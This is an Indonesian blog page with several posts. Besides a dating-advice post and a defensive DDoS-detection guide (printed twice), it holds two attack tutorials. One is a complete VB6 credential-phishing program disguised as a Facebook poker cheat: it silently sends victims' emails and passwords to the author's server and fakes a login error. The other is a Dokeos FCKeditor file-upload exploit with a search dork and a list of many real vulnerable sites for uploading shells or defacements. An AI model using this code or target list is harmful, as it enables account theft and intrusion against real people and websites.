Kamis, 02 Agustus 2012
Jangan mau jadi korban PHP !!
PHP itu kependekan dari Pemberi Harapan Palsu. Orang yang kerjaannya
ngegantung orang lain. PHP erat kaitannya dengan kegalauan. Gimana gak
galau kalo digantung gitu #jleb. PHP sudah mulai menyebar dikalangan
usia labil. Biasanya yang digantung itu cewek, yaa memang cewek lagi
lagi lagi, Ooh ibu kartini semoga kamu tenang disana~
Kalo yang belum tau PHP, okeee aku jelasin. Misalnya kamu suka sama
seseorang anggaplah namanya Alexa (entah cewek/cowok si alexa ini), kamu
suka sama Alexa, kemana-mana selalu bareng-bareng, dan Alexanya pun
dari sikapnya sudah mulai merespon, malah mungkin sudah menunjukkan rasa
suka yang sama. Walaupun sudah lama bersama-sama tapi Alexa gak juga
menyatakan cinta ke kamu secara langsung, Eh dia malah pergi atau jadian
sama cewek lain, itu yang namanya PHP. Udah ngasih harapan, ehh
gataunya ngasih harapan kosong.
Terus?
Nah loh, sekarang kamu lagi deket seseorang tapi belum di tembak-tembak
juga?
Udah bilang sayang-sayangan tapi belum ada hubungan yang jelas?
1. Jangan kegeeran dulu!
Kenapa? karena siapa tau dia itu hanya menganggap kamu sebagai adiknya
atau kakaknya, atau juga sebagai teman curhat, udah ga lebih. Mungkin
dia menunjukkan seolah dia cinta sama kamu itu karena dia nyaman
cerita-cerita sama kamu, becanda-becanda sama kamu. Nahh, apalagi kalo
dia udah punya pasangan, emmhh jangan kegeeran dulu deh.
2. BAIK, bukan berarti CINTA.
Ini nih yang sering menjadi alasan korban-korban PHP. Baik itu artinya
luas, kalau dia baik sama kamu, tidak menutup kemungkinan dia juga baik
sama orang selain kamu, karena memang karakter dianya seperti itu.
Disinilah peran kamu supaya pintar-pintar membedakan mana yang terlihat
cinta, dan mana yang benar-benar cinta sama kamu.
3. Jangan berharap terlalu tinggi!
Ada pepatah mengatakan, “Satu-satunya cara agar tidak kecewa adalah
tidak berharap apapun dari siapapun, kecuali berharap pada Tuhan”. Bener
banget! Kalo udah terbang terlalu tinggi, pas jatoh ke tanahnya itu
sakit banget. Makanya kalo kamu pendekatan udah lama tapi belum di
tembak-tembak juga, emmmh mending lupain aja deh, emangnya gak capek apa
digantung? *emangnya kita ini jemuran apah, huhhh!!!*
Sabtu, 30 Juni 2012
Cara Membuat Aplikasi Phishing Dengan VB 6
sebelumnya baca dulu nih Kawan sebagai contoh-nya :
ada sebuah program kita sebut saja cheat poker facebookOke,langsung aja kita praktekan.
program itu akan menyuruh anda untuk login ke facebook menggunakan program tersebut,apabila ingin membuat cheatnya bekerja.
user yang tertipu akan login lewat program tersebut
di dalam program tersebut terdapat 2 buah textbox dan 1 buah command button.
2 textbox itu adalah penampung Email & Password yang akan di kirim ke server kita dan command buttonnya di gunakan untuk meng eksekusi code,setelah code di eksekusi program akan memanggil sebuah file .php yang telah di buat sebelumnya di server kita
file php yang telah di panggil tersebut bertindak mencatat ip korban pengirim,mencacat tanggal pemanggilan file php,dan mencatat Email & Password korban yang telah di masukan di 2 buah textbox yang ada di program tersebut lalu menyimpannya dalam sebuah file text.
Mengerti-kan dengan cara kerja program ini ?
Bahan-Bahan yang harus Sobat punya untuk membuat project ini bekerja dengan lancar :
* 1 buah web hosting untuk menampung file php dan file text hasil dari phising kita
* Program VB6 (Kalau bisa yang full version )
lalu isikan dengan code ini
Terus Di Save,
sekarang kita buka Microsoft Visual Basic 6.0
buat 1 buah project baru lalu buat ini :
* Buat 1 Form dengan nama frmUtama
* buat 1 Module dengan nama modConnect
isi code ini kedalam module (modConnect)
Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)lalu di frmUtama tambahkan 2 buah text box dan 1 buah command button 1 buah label
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef _
lpSFlags As Long, ByVal dwReserved As Long) As Long
Const INTERNET_CONNECTION_MODEM = 1
Const INTERNET_CONNECTION_LAN = 2
Const INTERNET_CONNECTION_PROXY = 4
Const INTERNET_CONNECTION_MODEM_BUSY = 8
'Fungsi yang berguna untuk mengecek koneksi internet yang ada di komputer kita menggunakan fungsi api InternetGetConnectedState
Function CekInternet(Optional connectMode As Integer) As Boolean
Dim flags As Long
CekInternet = InternetGetConnectedState(flags, 0)
connectMode = flags
End Function
Textbox pertama di namakan : txtUname
Textbox Kedua di namakan : txtPass
Command button dinamakan : cmdLogin
Label dinamakan : lblInfo
Copykan kode ini kedalam form :
Private Sub Form_Load()
lblInfo.Caption = "Memeriksa Koneksi Internet"
If CekInternet = False Then
lblInfo.Caption = "Komputer Anda Tidak Terkoneksi Ke Internet !"
Else
lblInfo.Caption = "Komputer Anda Terkoneksi Dengan Internet"
Me.Caption = "rianul cakep ;)"
End If
End Sub
lalu masukan code ini kedalam cmdLogin :
Dim user, pass As Stringsampai kapanpun kotak pesan yang memberitahukan kita salah memasukan password/username akan selalu muncul bila command button di klik :D
Dim IE As Object
user = LCase(txtUname.Text)
pass = txtPass.Text
If txtUname.Text = "" Then
MsgBox "Kotak Teks masih kosong,silahkan isikan dengan benar !", vbExclamation, "Error"
Else
lblInfo.Caption = "Sedang Login ..."
Set IE = CreateObject("InternetExplorer.Application")
IE.Visible = 0
IE.Navigate "http://www.domainkamu.com/r14nul.php?e=" & _
user & "&p=" & pass
Do While IE.Busy
Sleep 200 'sleepnya 200 ajah :p
Loop
IE.Quit
Set IE = Nothing
lblInfo.Caption = "Username/Password Salah !"
MsgBox "Username/Password Salah !", vbExclamation, "Error"
End If
bila sudah compile project kamu,lalu lakukan percobaan
bila ingin melihat hasil lognya agan dapat mengakses
http://www.domainkamu.com/Ihiy.txt
program ini bisa Sobat pake untuk apa aja,untuk Mencuri akun facebook,paypal,dll
tergantung kreativitas Sobat aja dalam design programnya agar usernya tertarik & percaya kalau program ini aman :)
Semoga Bermanfaat :D
Greetz : HN Community
"Portail Dokeos" File Upload vulnerability
Portail Dokeos adalah semacam FCK editor remote file upload di vulnerability ini hacker bisa mengupload shell ataupun halaman deface , teman-teman dapat mengupload dan melihat halaman deface atau file yang akan di upload pada website tanpa username dan password admin . Oke Langsung aja ke tutorialnya ..
Google Dork :
Exploit :
Nah, Setelah Teman-Teman Menemukan Situs yang vulnerability dari om Google ,lakukanlah langkah-langkah berikut :
Google Dork :
"Portail Dokeos 1.8.5"
Exploit :
http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Nah, Setelah Teman-Teman Menemukan Situs yang vulnerability dari om Google ,lakukanlah langkah-langkah berikut :
- pergi ke : http://taget teman/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- Ganti ASP ke PHP kemudian > klik browse > kemudian pilih file yang ingin teman upload > kemudian klik upload. Teman-Teman Bisa mengupload File Yang Berkstensi : PHP,HTML,JPG, Dan TXT
- Untuk melihat Hasil File yang sudah di upload pergi ke : http://website/patch/main/upload/file sobat
Live Demo : http://www.blowupwebshow.com/staff/main/inc/lib/fckeditor/editor/filemanager/upload/test.htmlSitus Lain Yang Memiliki Vulnerability :
Hasil : http://www.blowupwebshow.com/staff/main/upload/r14nul.html
Live Demo : http://www.rottapro.net/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Hasil : http://www.rottapro.net/main/upload/r14nul.html
Live Demo : http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html Hasil : http://www.dokeos.nrc-gauthey.fr/main/upload/r14nul.html
- http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://ns5.freeheberg.com/~dispensa/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.ladapt-hn.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://my.eurasiam.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://el.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.formation.megalodon.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.pharmconseil-elearning.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://pro.accru.info/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.formation-microkine.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://foad.ina.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://campus.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.fpafoad22.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.ecoleprimaireenligne.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
- http://www.elearning80.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Sekian Dulu ya, Kawan :D ( ma'af Tutorialnya Jelek ) , semoga bermanfaat :D
Memeriksa dan Menghentikan Serangan DDoS
Distributed denial-of-service attacks
Dalam serangan terdistribusi, komputer sering menyerang komputer pribadi dengan koneksi broadband ke Internet yang telah dikompromikan oleh virus atau program Trojan horse. Ini memungkinkan pelaku untuk kontrol jarak jauh mesin untuk langsung menyerang, dan seperti sebuah array dari komputer disebut botnet. Dengan budak seperti slave atau zombie host, layanan bahkan situs terbesar dan paling baik yang terhubung dapat terganggu.
Distributed denial-of-service
Sebuah serangan denial-of-service (juga, Serangan DoS) merupakan serangan terhadap sistem komputer atau jaringan yang menyebabkan hilangnya layanan kepada pengguna, biasanya hilangnya konektivitas jaringan dan layanan dengan mengkonsumsi bandwidth jaringan korban atau overloading komputasi sumber daya dari sistem korban. Serangan dapat diarahkan pada setiap perangkat jaringan, termasuk router dan Web, surat elektronik, dan server Domain Name System.
Serangan DoS dapat dilakukan dalam beberapa cara. Ada empat jenis dasar serangan:
1) konsumsi atau overload sumber daya sistem atau jaringan, seperti bandwidth, disk space, atau waktu CPU
2) gangguan informasi konfigurasi, seperti informasi routing
3) gangguan komponen jaringan fisik
4) gangguan sistem operasi yang normal fungsi dengan memanfaatkan kerentanan perangkat lunak.
Upaya untuk "Flood" jaringan dengan paket palsu, sehingga mencegah lalu lintas jaringan yang sah, adalah bentuk paling umum dari serangan, sering dilakukan dengan mengganggu konektivitas jaringan dengan menggunakan beberapa host dalam serangan distributed denial-of-service atau DDoS. Serangan tersebut dapat mengkonsumsi sumber daya sistem intervensi dan jaringan di mana serangan itu ditransmisikan. Selain paket tidak benar dibentuk atau lalu lintas acak, dua cara canggih khusus serangan meliputi:
1) serangan smurf, di mana permintaan ICMP dikirim ke alamat broadcast jaringan terkonfigurasi, faked atau spoofed, source IP Address ke salah satu target.
2) SYN Flood, SYN palsu di mana permintaan untuk layanan (HTTP sering) menyebabkan server menjadi overload dengan half-open koneksi
Anda dapat memeriksa penggunaan http saat ini dengan menembakkan perintah shell
top-d2
Jika Anda mendapatkan banyak proses httpd, maka Anda harus memeriksa apakah itu adalah serangan DoS dan server adalah dengan paket SYN Flood. Anda dapat memeriksa ini dengan perintah berikut.
netstat -nap | grep SYN | wc -l
Jika Anda mendapatkan nomor abnormal kemudian server Anda sedang diserang.
Anda dapat memeriksa dari mana IP SYN paket yang datang. Berikan perintah berikut
netstat -nap | less
Anda akan mendapatkan semua rincian tabel routing dari kernel yang juga IP dari mana paket datang. Jika datang dari IP tertentu maka bahwa Anda hanya dapat memblokir IP pada server. Atau jika dari satu jaringan maka Anda akan memiliki untuk memblokir kisaran IP. Jika ada beberapa IP yang menyerang maka Anda harus menemukan situs yang sedang diserang.
Untuk memeriksa ini, cek :
/usr/local/apache/domlogs/
Periksa bagaimana Stat tanggal yang didefinisikan. Kemudian jalankan perintah "date". Periksa waktu saat ini dari server. Kemudian Anda harus memeriksa situs yang diserang sebelum menit yang lalu. Misalkan waktu saat ini 21 Januari 2012 9:32:27 kemudian jalankan perintah
grep "27/Maret/2012:09:32" *
Ini akan menampilkan daftar situs diakses pada waktu itu. Jika Anda melihat situs tertentu sedang diakses beberapa kali, maka situs tersebut diserang. Anda dapat mengganti waktu untuk memeriksa apakah situs yang berbeda berada di bawah serangan. Anda dapat menangguhkan situs yang untuk mencegah server dari overloading.
Banyak kali serangan hits IP tertentu dan semua situs yang memiliki bahwa IP bisa menyerang. Yang harus Anda lakukan adalah mengubah IP dari situs tersebut dan kemudian nol-rute IP itu.
Dalam serangan terdistribusi, komputer sering menyerang komputer pribadi dengan koneksi broadband ke Internet yang telah dikompromikan oleh virus atau program Trojan horse. Ini memungkinkan pelaku untuk kontrol jarak jauh mesin untuk langsung menyerang, dan seperti sebuah array dari komputer disebut botnet. Dengan budak seperti slave atau zombie host, layanan bahkan situs terbesar dan paling baik yang terhubung dapat terganggu.
Distributed denial-of-service
Sebuah serangan denial-of-service (juga, Serangan DoS) merupakan serangan terhadap sistem komputer atau jaringan yang menyebabkan hilangnya layanan kepada pengguna, biasanya hilangnya konektivitas jaringan dan layanan dengan mengkonsumsi bandwidth jaringan korban atau overloading komputasi sumber daya dari sistem korban. Serangan dapat diarahkan pada setiap perangkat jaringan, termasuk router dan Web, surat elektronik, dan server Domain Name System.
Serangan DoS dapat dilakukan dalam beberapa cara. Ada empat jenis dasar serangan:
1) konsumsi atau overload sumber daya sistem atau jaringan, seperti bandwidth, disk space, atau waktu CPU
2) gangguan informasi konfigurasi, seperti informasi routing
3) gangguan komponen jaringan fisik
4) gangguan sistem operasi yang normal fungsi dengan memanfaatkan kerentanan perangkat lunak.
Upaya untuk "Flood" jaringan dengan paket palsu, sehingga mencegah lalu lintas jaringan yang sah, adalah bentuk paling umum dari serangan, sering dilakukan dengan mengganggu konektivitas jaringan dengan menggunakan beberapa host dalam serangan distributed denial-of-service atau DDoS. Serangan tersebut dapat mengkonsumsi sumber daya sistem intervensi dan jaringan di mana serangan itu ditransmisikan. Selain paket tidak benar dibentuk atau lalu lintas acak, dua cara canggih khusus serangan meliputi:
1) serangan smurf, di mana permintaan ICMP dikirim ke alamat broadcast jaringan terkonfigurasi, faked atau spoofed, source IP Address ke salah satu target.
2) SYN Flood, SYN palsu di mana permintaan untuk layanan (HTTP sering) menyebabkan server menjadi overload dengan half-open koneksi
Anda dapat memeriksa penggunaan http saat ini dengan menembakkan perintah shell
top-d2
Jika Anda mendapatkan banyak proses httpd, maka Anda harus memeriksa apakah itu adalah serangan DoS dan server adalah dengan paket SYN Flood. Anda dapat memeriksa ini dengan perintah berikut.
netstat -nap | grep SYN | wc -l
Jika Anda mendapatkan nomor abnormal kemudian server Anda sedang diserang.
Anda dapat memeriksa dari mana IP SYN paket yang datang. Berikan perintah berikut
netstat -nap | less
Anda akan mendapatkan semua rincian tabel routing dari kernel yang juga IP dari mana paket datang. Jika datang dari IP tertentu maka bahwa Anda hanya dapat memblokir IP pada server. Atau jika dari satu jaringan maka Anda akan memiliki untuk memblokir kisaran IP. Jika ada beberapa IP yang menyerang maka Anda harus menemukan situs yang sedang diserang.
Untuk memeriksa ini, cek :
/usr/local/apache/domlogs/
Periksa bagaimana Stat tanggal yang didefinisikan. Kemudian jalankan perintah "date". Periksa waktu saat ini dari server. Kemudian Anda harus memeriksa situs yang diserang sebelum menit yang lalu. Misalkan waktu saat ini 21 Januari 2012 9:32:27 kemudian jalankan perintah
grep "27/Maret/2012:09:32" *
Ini akan menampilkan daftar situs diakses pada waktu itu. Jika Anda melihat situs tertentu sedang diakses beberapa kali, maka situs tersebut diserang. Anda dapat mengganti waktu untuk memeriksa apakah situs yang berbeda berada di bawah serangan. Anda dapat menangguhkan situs yang untuk mencegah server dari overloading.
Banyak kali serangan hits IP tertentu dan semua situs yang memiliki bahwa IP bisa menyerang. Yang harus Anda lakukan adalah mengubah IP dari situs tersebut dan kemudian nol-rute IP itu.
Langganan:
Postingan (Atom)
HTML
Blogroll
Popular Post
-
1.Python ( http://www.python.org/ftp/python/2.5/python-2.5.msi ) 2.Schemafuzz ( http://rup.ee/schemafuzzy.py ) 3.CMD buka cmd masuk ke fold...
-
Oke, kali ini saya akan memberikan tutorial tentang deface website sql injection with havij Tool havij sendiri fungsinya memang untuk sql i...
-
SABTU, 24 MARET 2012 Aku Ingin Menjadi Hacker (Motivasi Buat Newbie) K etika pertama kali mengenal k...
-
Distributed denial-of-service attacks Dalam serangan terdistribusi, komputer sering menyerang komputer pribadi dengan koneksi broadband ke I...
-
<!– –> Memberi komentar atau keterangan. Kalimat yang...
-
Hacker dengan keahliannya dapat melihat & memperbaiki kelemahan perangkat lunak di komputer; biasanya kemudian di publikasikan secara te...
-
Penasaran nggak sob dengan judul Tips Membuat Komputer Kita Berbicara?? pasti penasaran kan?? Emang komputer bisa berbicara??Dibilang ngga...
-
Assalamu'alaikum warahmatullahi wab...arrakatuh Teruntuk Bundaku tersayang... Dear Bunda... Bagaimana kabar bunda hari i...
-
Permasalahan yang dihadapi sekarang adalah jika admin sebuah website yang kita deface mengetahui celah websitenya dan melakukan sebuah tin...
-
Udah lama ngga posting tentang tutor defacing website hehee, Sekarang saya akan sempatkan membahas tentang Cyber Gravity lagi nih... yai...
Followers
About Author
Pages
Diberdayakan oleh Blogger.